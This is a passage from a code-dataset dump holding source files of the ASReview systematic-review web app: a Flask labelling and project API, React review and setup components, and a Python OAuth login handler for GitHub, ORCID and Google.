protected](\"/projects/<project_id>/record/<doc_id>\", methods=[\"POST\", \"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_classify_instance(project, doc_id): # noqa: F401\n \"\"\"Label item\n\n This request handles the document identifier and the corresponding label.\n The result is stored in a temp location. If this storage exceeds a certain\n amount of values, then the model is triggered. The values of the location\n are passed to the model and the storage is cleared. 
This model will run\n    in the background.\n    \"\"\"\n    # read the record identifier and the label from the request form\n    record_id = int(request.form.get(\"doc_id\"))\n    label = int(request.form.get(\"label\"))\n    note = request.form.get(\"note\", type=str)\n    if not note:\n        note = None\n\n    is_prior = request.form.get(\"is_prior\", default=False)\n\n    retrain_model = False if is_prior == \"1\" else True\n    prior = True if is_prior == \"1\" else False\n\n    if request.method == \"POST\":\n        with open_state(project.project_path, read_only=False) as state:\n            # add the labels (as prior knowledge if applicable)\n            state.add_labeling_data(\n                record_ids=[record_id], labels=[label], notes=[note], prior=prior\n            )\n\n    elif request.method == \"PUT\":\n        with open_state(project.project_path, read_only=False) as state:\n            if label in [0, 1]:\n                state.update_decision(record_id, label, note=note)\n            elif label == -1:\n                state.delete_record_labeling_data(record_id)\n\n    if retrain_model:\n        # retrain model\n        subprocess.Popen(\n            [\n                _get_executable(),\n                \"-m\",\n                \"asreview\",\n                \"web_run_model\",\n                str(project.project_path),\n            ]\n        )\n\n    response = jsonify({\"success\": True})\n\n    return response\n\n\[email protected](\"/projects/<project_id>/get_document\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_document(project):  # noqa: F401\n    \"\"\"Retrieve documents in order of review.\n\n    After these documents are retrieved, the queue on the client side is\n    updated. This request can be triggered after each document classification,\n    although it might be better to call this function only after every 20\n    requests on the client side.\n    \"\"\"\n    with open_state(project.project_path, read_only=False) as state:\n        # First check if there is a pending record.\n        _, _, pending = state.get_pool_labeled_pending()\n        if not pending.empty:\n            record_ids = pending.to_list()\n        # Else query for a new record.\n        else:\n            record_ids = state.query_top_ranked(1)\n\n    if len(record_ids) > 0:\n        new_instance = record_ids[0]\n\n        as_data = read_data(project)\n        record = as_data.record(int(new_instance))\n\n        item = {}\n        item[\"title\"] = record.title\n        item[\"authors\"] = record.authors\n        item[\"abstract\"] = record.abstract\n        item[\"doi\"] = record.doi\n        item[\"url\"] = record.url\n\n        # return the debug label\n        debug_label = record.extra_fields.get(\"debug_label\", None)\n        item[\"_debug_label\"] = int(debug_label) if pd.notnull(debug_label) else None\n\n        item[\"doc_id\"] = new_instance\n        pool_empty = False\n    else:\n        # end of pool\n        project.update_review(status=\"finished\")\n        item = None\n        pool_empty = True\n\n    return jsonify({\"result\": item, \"pool_empty\": pool_empty})\n\n\[email protected](\"/projects/<project_id>/delete\", methods=[\"DELETE\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_delete_project(project):  # noqa: F401\n    \"\"\"\"\"\"\n\n    if project.project_path.exists() and project.project_path.is_dir():\n        try:\n            # remove from database if applicable\n            if app_is_authenticated(current_app):\n                project = Project.query.filter(\n                    and_(\n                        Project.project_id == project.project_id,\n                        Project.owner_id == current_user.id,\n                    )\n                ).one_or_none()\n\n                if project is not None:\n                    DB.session.delete(project)\n                    DB.session.commit()\n                else:\n                    return jsonify(message=\"Failed to delete project in DB.\"), 500\n\n            # and remove the folder\n            shutil.rmtree(project.project_path)\n\n        except Exception as err:\n            logging.error(err)\n            return jsonify(message=\"Failed to delete project.\"), 500\n\n    response = jsonify({\"success\": 
True})\n\n return response\n" }, { "alpha_fraction": 0.5635679364204407, "alphanum_fraction": 0.5644367337226868, "avg_line_length": 23.31690216064453, "blob_id": "50e7927bacaff49d1139b9b1b1d40323c7cb469b", "content_id": "f66f2600d0b87fe06cf3a7c5584502103c7d8894", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6906, "license_type": "permissive", "max_line_length": 79, "num_lines": 284, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/ReviewPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQuery, useQueryClient } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport { Box, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { ActionsFeedbackBar } from \"../../Components\";\nimport {\n DecisionButton,\n DecisionUndoBar,\n ExplorationModeBanner,\n RecordCard,\n} from \"../ReviewComponents\";\n\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { useKeyPress } from \"../../hooks/useKeyPress\";\n\nimport \"./ReviewPage.css\";\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"100%\",\n}));\n\nconst ReviewPage = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [explorationMode, setExplorationMode] = React.useState(false);\n const [activeRecord, setActiveRecord] = React.useState(null);\n const [previousRecord, setPreviousRecord] = React.useState({\n record: null,\n label: null,\n note: null,\n show: false,\n });\n const [recordNote, setRecordNote] = React.useState({\n expand: false,\n shrink: true, // for smooth transition\n data: \"\",\n });\n const [undoState, setUndoState] = React.useState({\n open: false,\n message: null,\n });\n\n const relevantPress = useKeyPress(\"r\");\n const irrelevantPress = useKeyPress(\"i\");\n const undoPress = useKeyPress(\"u\");\n const notePress = useKeyPress(\"n\");\n\n const recordQuery = useQuery(\n [\"fetchRecord\", { project_id }],\n ProjectAPI.fetchRecord,\n {\n refetchOnWindowFocus: false,\n onSuccess: (data) => {\n if (data[\"pool_empty\"]) {\n queryClient.invalidateQueries(\"fetchInfo\");\n } else {\n setActiveRecord(data[\"result\"]);\n }\n },\n },\n );\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateClassification,\n {\n onMutate: (variables) => {\n closeUndoBar(); // hide potentially active undo bar\n setPreviousRecord({\n record: activeRecord,\n label: variables.label,\n note: variables.note,\n show: false,\n });\n },\n onSuccess: (data, variables) => {\n setActiveRecord(null);\n resetNote();\n queryClient.invalidateQueries(\"fetchRecord\");\n showUndoBarIfNeeded(variables.label, variables.initial);\n },\n },\n );\n\n /**\n * Previous record config\n */\n const loadPreviousRecord = () => {\n setPreviousRecord((s) => {\n return {\n ...s,\n show: true,\n };\n });\n setActiveRecord(previousRecord.record);\n setRecordNote((s) => {\n return {\n ...s,\n data: previousRecord.note,\n };\n });\n };\n\n const resetPreviousRecord = () => {\n setPreviousRecord({\n record: null,\n label: null,\n note: null,\n show: false,\n });\n };\n\n /**\n * Undo bar config\n */\n const showUndoBar = (message) => {\n setUndoState({\n open: true,\n message: message,\n });\n };\n\n const showUndoBarIfNeeded = (label, initial) => {\n if (props.undoEnabled) {\n const mark = label === 0 ? 
\"irrelevant\" : \"relevant\";\n const message = initial ? `Label saved as ${mark}` : \"Changes saved\";\n showUndoBar(message);\n }\n };\n\n const closeUndoBar = () => {\n setUndoState({\n open: false,\n message: null,\n });\n };\n\n const undoDecision = () => {\n closeUndoBar();\n loadPreviousRecord();\n };\n\n /**\n * Decision button config\n */\n const disableButton = () => {\n return !activeRecord || isLoading;\n };\n\n const needsClassification = (label) => {\n if (!previousRecord.show) {\n return true;\n }\n return (\n label !== previousRecord.label || recordNote.data !== previousRecord.note\n );\n };\n\n const skipClassification = () => {\n setActiveRecord(recordQuery.data[\"result\"]);\n resetPreviousRecord();\n resetNote();\n };\n\n const makeDecision = (label) => {\n if (!needsClassification(label)) {\n skipClassification();\n } else {\n mutate({\n project_id: project_id,\n doc_id: activeRecord.doc_id,\n label: label,\n note: recordNote.data,\n initial: !previousRecord.show,\n });\n }\n };\n\n /**\n * Note field config\n */\n const resetNote = () => {\n setRecordNote({\n expand: false,\n shrink: true,\n data: \"\",\n });\n };\n\n const noteFieldAutoFocus = () => {\n return !notePress;\n };\n\n /**\n * Display banner when in Exploration Mode\n */\n React.useEffect(() => {\n if (props.projectMode === \"explore\") {\n setExplorationMode(true);\n }\n }, [props.projectMode]);\n\n /**\n * Use keyboard shortcuts\n */\n React.useEffect(() => {\n if (props.keyPressEnabled && !recordNote.expand) {\n if (relevantPress && activeRecord) {\n makeDecision(1);\n }\n if (irrelevantPress && activeRecord) {\n makeDecision(0);\n }\n if (undoPress && activeRecord && undoState.open && props.undoEnabled) {\n undoDecision();\n }\n if (notePress && activeRecord) {\n setRecordNote((s) => {\n return {\n ...s,\n expand: true,\n shrink: false,\n };\n });\n }\n }\n // eslint-disable-next-line react-hooks/exhaustive-deps\n }, [relevantPress, irrelevantPress, undoPress, notePress]);\n\n return (\n <Root aria-label=\"review page\">\n <Fade in>\n <Box className=\"review-page-body-wrapper\">\n <Box className=\"review-page-body\">\n {/* Banner Exploration Mode */}\n <ExplorationModeBanner\n explorationMode={explorationMode}\n setExplorationMode={setExplorationMode}\n />\n {/* Article card */}\n <RecordCard\n disableButton={disableButton}\n error={recordQuery.error}\n isError={recordQuery.isError}\n activeRecord={activeRecord}\n recordNote={recordNote}\n setRecordNote={setRecordNote}\n fontSize={props.fontSize}\n mobileScreen={props.mobileScreen}\n noteFieldAutoFocus={noteFieldAutoFocus}\n previousRecord={previousRecord}\n />\n </Box>\n {/* Decision button */}\n <DecisionButton\n disableButton={disableButton}\n makeDecision={makeDecision}\n mobileScreen={props.mobileScreen}\n previousRecord={previousRecord}\n />\n </Box>\n </Fade>\n {/* Decision undo bar */}\n <DecisionUndoBar\n disableButton={disableButton}\n state={undoState}\n undo={undoDecision}\n close={closeUndoBar}\n />\n {/* Error handler */}\n {isError && (\n <ActionsFeedbackBar\n feedback={error?.message + \" Please try again.\"}\n open={isError}\n onClose={reset}\n />\n )}\n </Root>\n );\n};\n\nexport default ReviewPage;\n" }, { "alpha_fraction": 0.6583850979804993, "alphanum_fraction": 0.6583850979804993, "avg_line_length": 20.46666717529297, "blob_id": "d47fce1d0960563aa5f464a88533be9bd2b103c4", "content_id": "b268665a7f3a1dc44366e16d53408b5e771e0004", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": 
"JavaScript", "length_bytes": 322, "license_type": "permissive", "max_line_length": 52, "num_lines": 15, "path": "/asreview/webapp/src/context/AuthProvider.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\n\nconst AuthContext = React.createContext({});\n\nexport const AuthProvider = ({ children }) => {\n const [auth, setAuth] = React.useState(null);\n\n return (\n <AuthContext.Provider value={{ auth, setAuth }}>\n {children}\n </AuthContext.Provider>\n );\n};\n\nexport default AuthContext;\n" }, { "alpha_fraction": 0.5860509276390076, "alphanum_fraction": 0.5881932973861694, "avg_line_length": 30.350746154785156, "blob_id": "2418a308313d47bbe27511c27d3183d3e04f79d2", "content_id": "072cbe62e102388b351653f9bd0cb7279dd7c0c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4201, "license_type": "permissive", "max_line_length": 148, "num_lines": 134, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/DataForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { Box, CircularProgress, Stack, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { DataFormCard } from \"../DataComponents\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps } from \"../../../globals.js\";\n\nconst PREFIX = \"DataForm\";\n\nconst classes = {\n title: `${PREFIX}-title`,\n loading: `${PREFIX}-loading`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.title}`]: {\n paddingBottom: 24,\n },\n\n [`& .${classes.loading}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n },\n}));\n\nconst DataForm = (props) => {\n const queryClient = useQueryClient();\n\n const { data, error, isError, isFetching } = useQuery(\n [\"fetchData\", { project_id: props.project_id }],\n ProjectAPI.fetchData,\n {\n enabled: props.project_id !== null && props.datasetAdded,\n refetchOnWindowFocus: false,\n },\n );\n\n const priorAdded = () => {\n return (\n props.labeledStats &&\n props.labeledStats.n_inclusions !== 0 &&\n props.labeledStats.n_exclusions !== 0\n );\n };\n\n const refetchData = () => {\n queryClient.resetQueries(\"fetchData\");\n };\n\n const refetchInfo = () => {\n queryClient.prefetchQuery(\n [\"fetchInfo\", { project_id: props.project_id }],\n ProjectAPI.fetchInfo,\n );\n };\n\n const refetchLabeledStats = () => {\n queryClient.resetQueries(\"fetchLabeledStats\");\n };\n\n return (\n <Root>\n <Box className={classes.title}>\n <Typography variant=\"h6\">Data</Typography>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n A dataset contains textual records (e.g., abstracts of scientific\n papers, newspaper articles) that you want to label in interaction with\n the AI. 
Prior knowledge is required to warm up the AI.\n        </Typography>\n      </Box>\n      {!props.isFetchInfoError &&\n        (isFetching || props.isFetchingLabeledStats) && (\n          <Box className={classes.loading}>\n            <CircularProgress />\n          </Box>\n        )}\n      {!isFetching && isError && (\n        <InlineErrorHandler\n          message={error?.message}\n          refetch={refetchData}\n          button={true}\n        />\n      )}\n      {props.isFetchInfoError && (\n        <InlineErrorHandler\n          message={props.fetchInfoError?.message}\n          refetch={refetchInfo}\n          button={true}\n        />\n      )}\n      {!props.isFetchingLabeledStats && props.isFetchLabeledStatsError && (\n        <InlineErrorHandler\n          message={props.fetchLabeledStatsError?.message}\n          refetch={refetchLabeledStats}\n          button={true}\n        />\n      )}\n      {!isFetching &&\n        !props.isFetchingLabeledStats &&\n        !isError &&\n        !props.isFetchLabeledStatsError && (\n          <Stack direction=\"column\" spacing={3}>\n            <DataFormCard\n              added={props.datasetAdded}\n              primaryDefault=\"Add dataset\"\n              primaryAdded={\n                <React.Fragment>\n                  Dataset <i>{data?.filename}</i> added\n                </React.Fragment>\n              }\n              secondaryDefault=\"Import a dataset or select a built-in dataset\"\n              secondaryAdded={`Contains ${data?.n_rows} records with approximately ${data?.n_duplicates} duplicates`}\n              toggleAddCard={props.toggleAddDataset}\n            />\n            <DataFormCard\n              added={priorAdded()}\n              datasetAdded={props.datasetAdded}\n              primaryDefault=\"Add prior knowledge\"\n              primaryAdded=\"Prior knowledge added\"\n              secondaryDefault=\"Label at least 1 relevant and 1 irrelevant record to warm up the AI\"\n              secondaryAdded={`${props.labeledStats?.n_prior_inclusions} relevant and ${props.labeledStats?.n_prior_exclusions} irrelevant records`}\n              toggleAddCard={props.toggleAddPriorKnowledge}\n            />\n          </Stack>\n        )}\n    </Root>\n  );\n};\n\nexport default connect(mapStateToProps)(DataForm);\n" }, { "alpha_fraction": 0.5304224491119385, "alphanum_fraction": 0.5334174036979675, "avg_line_length": 36.761905670166016, "blob_id": "c1531ed384b2dc34b6406680731242f8b72d0ebb", "content_id": "d54a0066ea24f97027dc2ab2b46de564f31ed565", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6344, "license_type": "permissive", "max_line_length": 87, "num_lines": 168, "path": "/asreview/webapp/authentication/oauth_handler.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport requests\n\n\nclass OAuthHandler:\n    def __init__(self, configs=None):\n        if not (bool(configs) and isinstance(configs, dict)):\n            raise ValueError(\"OAuthHandler needs a configuration dictionary.\")\n\n        # check if all necessary config parameters are there\n        services = {}\n        for provider, config in configs.items():\n            # get required parameters\n            authorization_url = config.get(\"AUTHORIZATION_URL\", False)\n            token_url = config.get(\"TOKEN_URL\", False)\n            client_id = config.get(\"CLIENT_ID\", False)\n            secret = config.get(\"CLIENT_SECRET\", False)\n            scope = config.get(\"SCOPE\", \"\")\n            if not (\n                all(\n                    [\n                        bool(authorization_url),\n                        bool(token_url),\n                        bool(client_id),\n                        bool(secret),\n                    ]\n                )\n            ):\n                raise ValueError(f\"OAuthHandler has insufficient data for {provider}\")\n            else:\n                # rebuild config\n                services[provider.lower()] = {\n                    \"authorization_url\": authorization_url,\n                    \"token_url\": token_url,\n                    \"client_id\": client_id,\n                    \"secret\": secret,\n                    \"scope\": scope,\n                }\n        # set the config dictionary\n        self.services = services\n\n    def front_end_params(self):\n        \"\"\"prepare a service dictionary for front-end: remove secrets\"\"\"\n        result = {}\n        # remove secret from service parameters\n        for k, v in self.services.items():\n            c = v.copy()\n            c.pop(\"secret\")\n            result[k] = c\n        return result\n\n    def providers(self):\n        \"\"\"Returns a list with stored providers\"\"\"\n        return list(self.services.keys())\n\n    def get_user_credentials(self, provider, code, redirect_uri=None):\n        \"\"\"Extract User credentials with the help of a code\"\"\"\n        result = False\n        if provider == \"github\":\n            result = self.__handle_github(code)\n        elif provider == \"orcid\":\n            result = self.__handle_orcid(code)\n        elif provider == \"google\":\n            result = self.__handle_google(code, redirect_uri)\n        else:\n            raise ValueError(f\"Could not find provider {provider}\")\n        return result\n\n    def __handle_orcid(self, code):\n        \"\"\"Handles OAuth roundtrip for Orcid\"\"\"\n        # request token\n        params = self.services[\"orcid\"]\n        response = requests.post(\n            params[\"token_url\"],\n            data={\n                \"code\": code,\n                \"client_id\": params[\"client_id\"],\n                \"client_secret\": params[\"secret\"],\n                \"grant_type\": \"authorization_code\",\n                \"scope\": \"/authenticate\",\n            },\n            headers={\"Accept\": \"application/json\"},\n        ).json()\n        id = response[\"orcid\"]\n        name = response.get(\"name\", \"\")\n        # TODO@Casper: I don't understand why I can't\n        # get an email address from the public API. The\n        # next call responds with a 401 Unauthorized which\n        # doesn't make sense (I've set my email address on 'public')\n        # because the call and the scope should be OK. 
Why!?\n        # token = response['access_token']\n        # response = requests.get(\n        #     f'https://api.sandbox.orcid.org/v3.0/{id}/email',\n        #     headers={\n        #         'Authorization': f'Bearer {token}',\n        #         'Accept': 'application/json'\n        #     }\n        # ).json()\n        # print(response.json())\n        return (id, \"email-unknown\", name)\n\n    def __handle_github(self, code):\n        \"\"\"Handles OAuth roundtrip for GitHub\"\"\"\n        # request token\n        params = self.services[\"github\"]\n        response = requests.post(\n            params[\"token_url\"],\n            data={\n                \"code\": code,\n                \"client_id\": params[\"client_id\"],\n                \"client_secret\": params[\"secret\"],\n            },\n            headers={\"Accept\": \"application/json\"},\n        ).json()\n        # if all is well, we have a token\n        token = response.get(\"access_token\", \"\")\n        # get a user profile\n        response = requests.get(\n            \"https://api.github.com/user\",\n            headers={\"Authorization\": f\"Bearer {token}\", \"Accept\": \"application/json\"},\n        )\n        response = response.json()\n        id = response[\"id\"]\n        email = response.get(\"email\", \"email-unknown\")\n        name = response[\"name\"] or response[\"login\"] or response[\"id\"]\n        return (id, email, name)\n\n    def __handle_google(self, code, redirect_uri):\n        # request token\n        params = self.services[\"google\"]\n        response = requests.post(\n            params[\"token_url\"],\n            data={\n                \"code\": code,\n                \"client_id\": params[\"client_id\"],\n                \"client_secret\": params[\"secret\"],\n                \"grant_type\": \"authorization_code\",\n                \"redirect_uri\": redirect_uri,\n            },\n            headers={\"Accept\": \"application/json\"},\n        ).json()\n        # if all is well, we have a token\n        token = response.get(\"access_token\", \"\")\n        # get email\n        response = requests.post(\n            \"https://www.googleapis.com/oauth2/v3/userinfo\",\n            data={\"access_token\": token},\n            headers={\"Accept\": \"application/json\"},\n        ).json()\n        id = response[\"sub\"]\n        email = response.get(\"email\", \"email-unknown\")\n        name = (\n            response.get(\"name\", False) or response.get(\"family_name\", False) or \"Name\"\n        )\n        return (id, email, name)\n" }, { "alpha_fraction": 0.5171048641204834, "alphanum_fraction": 0.5206389427185059, "avg_line_length": 26.312742233276367, "blob_id": "ba13e9bb5062f5fb69e7aea19ae81bc0b15836e8", "content_id": "e3e8a5e8f47336ad0543b9c536fe8abed4e544aa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7074, "license_type": "permissive", "max_line_length": 74, "num_lines": 259, "path": "/asreview/webapp/src/Components/HelpDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n  Avatar,\n  Card,\n  CardActionArea,\n  CardHeader,\n  CircularProgress,\n  Dialog,\n  DialogContent,\n  DialogTitle,\n  Divider,\n  List,\n  ListItem,\n  ListItemIcon,\n  ListItemText,\n  Stack,\n  Tooltip,\n  Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport {\n  Close,\n  Description,\n  Feedback,\n  QuestionAnswer,\n} from \"@mui/icons-material\";\n\nimport {\n  AppBarWithinDialog,\n  BoxErrorHandler,\n  OpenInNewIconStyled,\n} from \"../Components\";\nimport { StyledIconButton } from \"../StyledComponents/StyledButton.js\";\n\nimport { UtilsAPI } from \"../api/index.js\";\nimport { feedbackURL } from \"../globals.js\";\nimport { toggleHelpDialog } from \"../redux/actions\";\n\nconst mapStateToProps = (state) => {\n  return {\n    onHelpDialog: state.onHelpDialog,\n  };\n};\n\nconst mapDispatchToProps = (dispatch) => 
{\n return {\n toggleHelpDialog: () => {\n dispatch(toggleHelpDialog());\n },\n };\n};\n\nconst PREFIX = \"HelpDialog\";\n\nconst classes = {\n faq: `${PREFIX}-faq`,\n faqHeight: `${PREFIX}-faq-height`,\n contact: `${PREFIX}-contact`,\n contactAvatar: `${PREFIX}-contact-avatar`,\n divider: `${PREFIX}-divider`,\n sectionTitle: `${PREFIX}-section-title`,\n};\n\nconst StyledDialog = styled(Dialog)(({ theme }) => ({\n [`& .${classes.faq}`]: {\n height: 250,\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.faqHeight}`]: {\n minHeight: 353,\n },\n\n [`& .${classes.contact}`]: {\n width: \"100%\",\n marginLeft: 20,\n marginRight: 20,\n },\n\n [`& .${classes.contactAvatar}`]: {\n width: theme.spacing(4),\n height: theme.spacing(4),\n color: theme.palette.getContrastText(theme.palette.primary.main),\n backgroundColor: theme.palette.primary.main,\n },\n\n [`& .${classes.divider}`]: {\n marginTop: 8,\n marginBottom: 8,\n },\n\n [`& .${classes.sectionTitle}`]: {\n paddingLeft: 20,\n },\n}));\n\nconst HelpDialog = (props) => {\n const descriptionElementRef = React.useRef(null);\n\n const { data, error, isError, isFetched, isFetching } = useQuery(\n \"fetchFAQ\",\n UtilsAPI.fetchFAQ,\n {\n enabled: props.onHelpDialog,\n refetchOnWindowFocus: false,\n },\n );\n\n React.useEffect(() => {\n if (props.onHelpDialog) {\n const { current: descriptionElement } = descriptionElementRef;\n if (descriptionElement !== null) {\n descriptionElement.focus();\n }\n }\n }, [props.onHelpDialog]);\n\n return (\n <StyledDialog\n fullScreen={props.mobileScreen}\n open={props.onHelpDialog}\n onClose={props.toggleHelpDialog}\n scroll=\"paper\"\n fullWidth\n maxWidth=\"sm\"\n >\n {!props.mobileScreen && (\n <Stack className=\"dialog-header\" direction=\"row\" spacing={1}>\n <StyledIconButton className=\"dialog-header-button left-empty\" />\n <DialogTitle>Help</DialogTitle>\n <Tooltip title=\"Close\">\n <StyledIconButton\n className=\"dialog-header-button right\"\n onClick={props.toggleHelpDialog}\n >\n <Close />\n </StyledIconButton>\n </Tooltip>\n </Stack>\n )}\n {props.mobileScreen && (\n <AppBarWithinDialog\n onClickStartIcon={props.toggleHelpDialog}\n title=\"Help\"\n />\n )}\n <DialogContent dividers sx={{ padding: \"0px 0px 20px 0px\" }}>\n <List className={classes.faqHeight}>\n <ListItem>\n <Typography className={classes.sectionTitle} display=\"block\">\n <b>Frequently Asked Questions</b>\n </Typography>\n </ListItem>\n {!isError && isFetching && (\n <Stack className={classes.faq}>\n <CircularProgress />\n </Stack>\n )}\n {!isError &&\n isFetched &&\n data.map((element, index) => (\n <ListItem\n key={element.url}\n button\n component={\"a\"}\n href={element.url}\n target=\"_blank\"\n alignItems=\"flex-start\"\n >\n <ListItemIcon sx={{ justifyContent: \"center\" }}>\n <Description color=\"primary\" />\n </ListItemIcon>\n <ListItemText\n key={element.title}\n primary={\n <React.Fragment>\n {element.title} <OpenInNewIconStyled />\n </React.Fragment>\n }\n />\n </ListItem>\n ))}\n {isError && (\n <Stack className={classes.faq}>\n <BoxErrorHandler error={error} queryKey=\"fetchFAQ\" />\n </Stack>\n )}\n <ListItem\n button\n component={\"a\"}\n href={`https://asreview.readthedocs.io/en/latest/`}\n target=\"_blank\"\n >\n <ListItemIcon></ListItemIcon>\n <Typography display=\"block\" color=\"primary\">\n <b>Browse the documentation</b> <OpenInNewIconStyled />\n </Typography>\n </ListItem>\n </List>\n <Divider className={classes.divider} />\n <List>\n <ListItem>\n <Typography 
className={classes.sectionTitle} display=\"block\">\n <b>Need more help?</b>\n </Typography>\n </ListItem>\n <ListItem>\n <Card className={classes.contact}>\n <CardActionArea\n href={`https://github.com/asreview/asreview/discussions`}\n target=\"_blank\"\n >\n <CardHeader\n avatar={\n <Avatar className={classes.contactAvatar}>\n <QuestionAnswer fontSize=\"small\" />\n </Avatar>\n }\n title={\n <React.Fragment>\n Ask the ASReview Community <OpenInNewIconStyled />\n </React.Fragment>\n }\n subheader=\"Get answers from experts in the community\"\n />\n </CardActionArea>\n </Card>\n </ListItem>\n\n <ListItem>\n <Card className={classes.contact}>\n <CardActionArea href={feedbackURL} target=\"_blank\">\n <CardHeader\n avatar={\n <Avatar className={classes.contactAvatar}>\n <Feedback fontSize=\"small\" />\n </Avatar>\n }\n title={\n <React.Fragment>\n Send Feedback <OpenInNewIconStyled />\n </React.Fragment>\n }\n subheader=\"Report bugs or request features on GitHub\"\n />\n </CardActionArea>\n </Card>\n </ListItem>\n </List>\n </DialogContent>\n </StyledDialog>\n );\n};\n\nexport default connect(mapStateToProps, mapDispatchToProps)(HelpDialog);\n" }, { "alpha_fraction": 0.5143827795982361, "alphanum_fraction": 0.5186862945556641, "avg_line_length": 26.25308609008789, "blob_id": "b14461bb05063c9238db020c526adab71c048b70", "content_id": "385850a5831d247f9d10848d39b33cd31e229a31", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4415, "license_type": "permissive", "max_line_length": 80, "num_lines": 162, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/DatasetFromURL.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { InputBase, Paper, Stack } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { useMutation } from \"react-query\";\n\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport InputLabel from \"@mui/material/InputLabel\";\nimport MenuItem from \"@mui/material/MenuItem\";\nimport FormControl from \"@mui/material/FormControl\";\nimport Select from \"@mui/material/Select\";\nimport ArrowForwardOutlinedIcon from \"@mui/icons-material/ArrowForwardOutlined\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { StyledLoadingButton } from \"../../../StyledComponents/StyledButton\";\nimport { ProjectAPI } from \"../../../api/index.js\";\n\nconst PREFIX = \"DatasetFromURL\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n input: `${PREFIX}-input`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.root}`]: {\n alignItems: \"center\",\n },\n\n [`& .${classes.input}`]: {\n display: \"flex\",\n alignItems: \"center\",\n width: \"100%\",\n padding: \"4px 8px\",\n },\n}));\n\nconst DatasetFromURL = (props) => {\n const [localURL, setLocalURL] = React.useState(\"\");\n\n const { error, isError, isLoading, mutate, data } = useMutation(\n ProjectAPI.mutateData,\n {\n onSuccess: (data, variables, context) => {\n if (data[\"files\"] && data[\"files\"].length === 1) {\n props.setURL(data[\"files\"][0][\"link\"]);\n }\n },\n },\n );\n\n const handleURL = (event) => {\n setLocalURL(event.target.value);\n };\n\n const addURL = (event) => {\n // validate the url first\n mutate({ project_id: props.project_id, url: localURL, validate: true });\n };\n\n const addURLOnEnter = (event) => {\n if (event.keyCode === 13) {\n addURL(event);\n }\n };\n\n const addFile = (event) => 
{\n // upload dataset\n props.handleSaveDataset();\n };\n\n const handleFileChange = (event) => {\n props.setURL(event.target.value);\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n <Paper\n className={classes.input}\n component=\"form\"\n noValidate\n autoComplete=\"off\"\n onSubmit={(e) => e.preventDefault()}\n variant=\"outlined\"\n >\n <InputBase\n autoFocus\n disabled={props.isAddingDataset || isLoading}\n fullWidth\n id=\"url-dataset\"\n placeholder=\"Type a URL or DOI of the dataset\"\n value={localURL}\n onChange={handleURL}\n onKeyDown={addURLOnEnter}\n sx={{ ml: 1, flex: 1 }}\n />\n <StyledLoadingButton\n disabled={!localURL || props.isAddingDataset}\n loading={isLoading}\n onClick={addURL}\n sx={{ minWidth: \"32px\" }}\n >\n <ArrowForwardOutlinedIcon />\n </StyledLoadingButton>\n </Paper>\n\n {data && data[\"files\"] && (\n <FormControl\n sx={{ m: 1, minWidth: 120 }}\n disabled={props.isAddingDataset || data[\"files\"].length === 1}\n >\n <InputLabel id=\"select-file-label\">Select dataset</InputLabel>\n <Select\n labelId=\"select-file-label\"\n id=\"select-file\"\n value={props.url}\n label=\"Select dataset\"\n onChange={handleFileChange}\n >\n 